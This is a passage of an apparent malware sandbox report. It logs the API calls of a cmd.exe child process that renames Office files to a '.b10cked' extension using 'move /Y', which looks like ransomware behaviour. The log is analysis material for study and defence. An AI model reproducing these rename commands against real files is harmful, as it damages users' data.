lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2e1cb8) returned 0x2e2128 [0153.584] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\MAPIR.DLL.trx_dll.b10cked", nBufferLength=0x104, lpBuffer=0x20ef14, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\MAPIR.DLL.trx_dll.b10cked", lpFilePart=0x0) returned 0x49 [0153.584] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\MAPIR.DLL.trx_dll", nBufferLength=0x104, lpBuffer=0x20ef14, lpFilePart=0x0 | out: 
lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\MAPIR.DLL.trx_dll", lpFilePart=0x0) returned 0x41 [0153.584] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\MAPIR.DLL.trx_dll" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\mapir.dll.trx_dll")) returned 0x2020 [0153.585] MoveFileExW (lpExistingFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\MAPIR.DLL.trx_dll" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\mapir.dll.trx_dll"), lpNewFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\MAPIR.DLL.trx_dll.b10cked" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\mapir.dll.trx_dll.b10cked"), dwFlags=0x3) returned 1 [0153.585] FindClose (in: hFindFile=0x2e2128 | out: hFindFile=0x2e2128) returned 1 [0153.585] _vsnwprintf (in: _Buffer=0x4a9e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x20eec8 | out: _Buffer=" 1") returned 9 [0153.585] _get_osfhandle (_FileHandle=1) returned 0x7 [0153.585] GetFileType (hFile=0x7) returned 0x2 [0153.585] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0153.586] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x20ee54 | out: lpMode=0x20ee54) returned 1 [0153.586] _get_osfhandle (_FileHandle=1) returned 0x7 [0153.586] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x20ee88 | out: lpConsoleScreenBufferInfo=0x20ee88) returned 1 [0153.586] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0153.586] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x20eec8 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0153.586] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x20eeac, 
lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x20eeac*=0x1a) returned 1 [0153.587] _get_osfhandle (_FileHandle=1) returned 0x7 [0153.587] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0153.587] _get_osfhandle (_FileHandle=1) returned 0x7 [0153.587] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0153.587] _get_osfhandle (_FileHandle=0) returned 0x3 [0153.587] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0153.587] SetConsoleInputExeNameW () returned 0x1 [0153.587] GetConsoleOutputCP () returned 0x1b5 [0153.587] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0153.587] SetThreadUILanguage (LangId=0x0) returned 0x409 [0153.588] exit (_Code=0) Process: id = "254" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16ca0" os_pid = "0xe20" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\MOR6IN~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\MOR6INT.REST.trx_dll.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 20737 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 20738 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = 
pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 20739 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 20740 start_va = 0x1f0000 end_va = 0x2effff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 20741 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 20742 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 20743 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 20744 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 20745 start_va = 0x7ffd3000 end_va = 0x7ffd3fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd3000" filename = "" Region: id = 20746 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 20822 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 20823 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 20824 start_va = 0x50000 end_va = 0x14ffff entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 20825 start_va 
= 0x150000 end_va = 0x1b6fff entry_point = 0x150000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 20826 start_va = 0x390000 end_va = 0x39ffff entry_point = 0x0 region_type = private name = "private_0x0000000000390000" filename = "" Region: id = 20827 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 20828 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 20829 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 20830 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 20831 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 20832 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 20833 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 20834 start_va = 0x773e0000 end_va = 
0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 20835 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 20836 start_va = 0x3a0000 end_va = 0x467fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 20837 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 20838 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 20839 start_va = 0x1c0000 end_va = 0x1c6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 20840 start_va = 0x1d0000 end_va = 0x1d1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 20841 start_va = 0x1e0000 end_va = 0x1e0fff entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 20842 start_va = 0x2f0000 end_va = 0x2f0fff entry_point = 0x0 region_type = private name = "private_0x00000000002f0000" filename = "" Region: id = 20843 start_va = 0x470000 end_va = 0x570fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 20844 start_va = 0x580000 end_va = 0x117ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 20845 start_va = 0x1180000 end_va = 0x12e2fff entry_point = 0x0 region_type = pagefile_backed name = 
"pagefile_0x0000000001180000" filename = "" Thread: id = 317 os_tid = 0xeac [0153.514] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2efa84 | out: lpSystemTimeAsFileTime=0x2efa84*(dwLowDateTime=0x957071a0, dwHighDateTime=0x1d440a9)) [0153.514] GetCurrentProcessId () returned 0xe20 [0153.514] GetCurrentThreadId () returned 0xeac [0153.514] GetTickCount () returned 0x2f49a [0153.514] QueryPerformanceCounter (in: lpPerformanceCount=0x2efa7c | out: lpPerformanceCount=0x2efa7c*=21030312099) returned 1 [0153.515] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0153.515] __set_app_type (_Type=0x1) [0153.515] __p__fmode () returned 0x76b331f4 [0153.515] __p__commode () returned 0x76b331fc [0153.515] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0153.515] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0153.515] GetCurrentThreadId () returned 0xeac [0153.515] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xeac) returned 0x38 [0153.515] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0153.515] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0153.515] SetThreadUILanguage (LangId=0x0) returned 0x409 [0153.517] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0153.517] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x2efa14 | out: phkResult=0x2efa14*=0x0) returned 0x2 [0153.517] VirtualQuery (in: lpAddress=0x2efa4b, lpBuffer=0x2ef9e4, dwLength=0x1c | out: lpBuffer=0x2ef9e4*(BaseAddress=0x2ef000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0153.517] VirtualQuery (in: 
lpAddress=0x1f0000, lpBuffer=0x2ef9e4, dwLength=0x1c | out: lpBuffer=0x2ef9e4*(BaseAddress=0x1f0000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0153.517] VirtualQuery (in: lpAddress=0x1f1000, lpBuffer=0x2ef9e4, dwLength=0x1c | out: lpBuffer=0x2ef9e4*(BaseAddress=0x1f1000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0153.517] VirtualQuery (in: lpAddress=0x1f3000, lpBuffer=0x2ef9e4, dwLength=0x1c | out: lpBuffer=0x2ef9e4*(BaseAddress=0x1f3000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0153.517] VirtualQuery (in: lpAddress=0x2f0000, lpBuffer=0x2ef9e4, dwLength=0x1c | out: lpBuffer=0x2ef9e4*(BaseAddress=0x2f0000, AllocationBase=0x2f0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0153.517] GetConsoleOutputCP () returned 0x1b5 [0153.518] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0153.518] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0153.518] _get_osfhandle (_FileHandle=1) returned 0x7 [0153.518] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0153.518] _get_osfhandle (_FileHandle=1) returned 0x7 [0153.518] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0153.518] _get_osfhandle (_FileHandle=1) returned 0x7 [0153.518] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0153.518] _get_osfhandle (_FileHandle=0) returned 0x3 [0153.518] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0153.519] _get_osfhandle (_FileHandle=0) returned 0x3 [0153.519] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0153.519] GetEnvironmentStringsW () returned 0x60210* [0153.519] 
FreeEnvironmentStringsW (penv=0x60210) returned 1 [0153.519] GetEnvironmentStringsW () returned 0x60210* [0153.519] FreeEnvironmentStringsW (penv=0x60210) returned 1 [0153.519] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2ee984 | out: phkResult=0x2ee984*=0x40) returned 0x0 [0153.519] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2ee98c, lpData=0x2ee990, lpcbData=0x2ee988*=0x1000 | out: lpType=0x2ee98c*=0x0, lpData=0x2ee990*=0xa0, lpcbData=0x2ee988*=0x1000) returned 0x2 [0153.519] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2ee98c, lpData=0x2ee990, lpcbData=0x2ee988*=0x1000 | out: lpType=0x2ee98c*=0x4, lpData=0x2ee990*=0x1, lpcbData=0x2ee988*=0x4) returned 0x0 [0153.519] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2ee98c, lpData=0x2ee990, lpcbData=0x2ee988*=0x1000 | out: lpType=0x2ee98c*=0x0, lpData=0x2ee990*=0x1, lpcbData=0x2ee988*=0x1000) returned 0x2 [0153.519] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2ee98c, lpData=0x2ee990, lpcbData=0x2ee988*=0x1000 | out: lpType=0x2ee98c*=0x4, lpData=0x2ee990*=0x0, lpcbData=0x2ee988*=0x4) returned 0x0 [0153.520] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2ee98c, lpData=0x2ee990, lpcbData=0x2ee988*=0x1000 | out: lpType=0x2ee98c*=0x4, lpData=0x2ee990*=0x40, lpcbData=0x2ee988*=0x4) returned 0x0 [0153.520] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2ee98c, lpData=0x2ee990, lpcbData=0x2ee988*=0x1000 | out: lpType=0x2ee98c*=0x4, lpData=0x2ee990*=0x40, lpcbData=0x2ee988*=0x4) returned 0x0 [0153.520] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2ee98c, lpData=0x2ee990, lpcbData=0x2ee988*=0x1000 | out: lpType=0x2ee98c*=0x0, 
lpData=0x2ee990*=0x40, lpcbData=0x2ee988*=0x1000) returned 0x2 [0153.520] RegCloseKey (hKey=0x40) returned 0x0 [0153.520] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2ee984 | out: phkResult=0x2ee984*=0x40) returned 0x0 [0153.520] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2ee98c, lpData=0x2ee990, lpcbData=0x2ee988*=0x1000 | out: lpType=0x2ee98c*=0x0, lpData=0x2ee990*=0x40, lpcbData=0x2ee988*=0x1000) returned 0x2 [0153.520] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2ee98c, lpData=0x2ee990, lpcbData=0x2ee988*=0x1000 | out: lpType=0x2ee98c*=0x4, lpData=0x2ee990*=0x1, lpcbData=0x2ee988*=0x4) returned 0x0 [0153.520] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2ee98c, lpData=0x2ee990, lpcbData=0x2ee988*=0x1000 | out: lpType=0x2ee98c*=0x0, lpData=0x2ee990*=0x1, lpcbData=0x2ee988*=0x1000) returned 0x2 [0153.520] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2ee98c, lpData=0x2ee990, lpcbData=0x2ee988*=0x1000 | out: lpType=0x2ee98c*=0x4, lpData=0x2ee990*=0x0, lpcbData=0x2ee988*=0x4) returned 0x0 [0153.520] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2ee98c, lpData=0x2ee990, lpcbData=0x2ee988*=0x1000 | out: lpType=0x2ee98c*=0x4, lpData=0x2ee990*=0x9, lpcbData=0x2ee988*=0x4) returned 0x0 [0153.520] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2ee98c, lpData=0x2ee990, lpcbData=0x2ee988*=0x1000 | out: lpType=0x2ee98c*=0x4, lpData=0x2ee990*=0x9, lpcbData=0x2ee988*=0x4) returned 0x0 [0153.520] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2ee98c, lpData=0x2ee990, lpcbData=0x2ee988*=0x1000 | out: lpType=0x2ee98c*=0x0, lpData=0x2ee990*=0x9, lpcbData=0x2ee988*=0x1000) returned 0x2 [0153.520] 
RegCloseKey (hKey=0x40) returned 0x0 [0153.520] time (in: timer=0x0 | out: timer=0x0) returned 0x5b88637c [0153.520] srand (_Seed=0x5b88637c) [0153.520] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\MOR6IN~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\MOR6INT.REST.trx_dll.b10cked\"" [0153.520] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\MOR6IN~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\MOR6INT.REST.trx_dll.b10cked\"" [0153.520] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0153.521] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x61970, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0153.521] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0153.521] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0153.521] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0153.521] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0153.521] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0153.521] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0153.521] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0153.521] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0153.521] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0153.521] _wcsicmp (_String1="PROMPT", _String2="RANDOM") 
returned -2 [0153.521] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0153.521] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0153.521] GetEnvironmentStringsW () returned 0x62360* [0153.522] FreeEnvironmentStringsW (penv=0x62360) returned 1 [0153.522] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0153.522] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0153.522] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0153.522] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0153.522] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0153.522] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0153.522] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0153.522] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0153.522] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0153.522] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0153.522] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x2ef750 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0153.522] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x2ef750, lpFilePart=0x2ef74c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x2ef74c*="Desktop") returned 0x18 [0153.522] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0153.522] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x2ef4cc | out: lpFindFileData=0x2ef4cc) returned 0x609f0 [0153.522] FindClose (in: hFindFile=0x609f0 | out: hFindFile=0x609f0) returned 1 [0153.522] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x2ef4cc | out: lpFindFileData=0x2ef4cc) returned 0x609f0 [0153.523] 
FindClose (in: hFindFile=0x609f0 | out: hFindFile=0x609f0) returned 1 [0153.523] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x2ef4cc | out: lpFindFileData=0x2ef4cc) returned 0x609f0 [0153.523] FindClose (in: hFindFile=0x609f0 | out: hFindFile=0x609f0) returned 1 [0153.523] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0153.523] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0153.523] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0153.523] GetEnvironmentStringsW () returned 0x60210* [0153.523] FreeEnvironmentStringsW (penv=0x60210) returned 1 [0153.523] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0153.524] GetConsoleOutputCP () returned 0x1b5 [0153.524] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0153.524] GetUserDefaultLCID () returned 0x409 [0153.524] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0153.524] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x2ef890, cchData=128 | out: lpLCData="0") returned 2 [0153.524] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x2ef890, cchData=128 | out: lpLCData="0") returned 2 [0153.524] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x2ef890, cchData=128 | out: lpLCData="1") returned 2 [0153.525] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0153.525] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0153.525] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0153.525] GetLocaleInfoW (in: 
Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0153.525] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0153.525] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0153.525] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0153.525] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0153.525] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0153.525] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0153.525] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0153.526] GetConsoleTitleW (in: lpConsoleTitle=0x50930, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0153.526] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0153.526] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0153.526] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 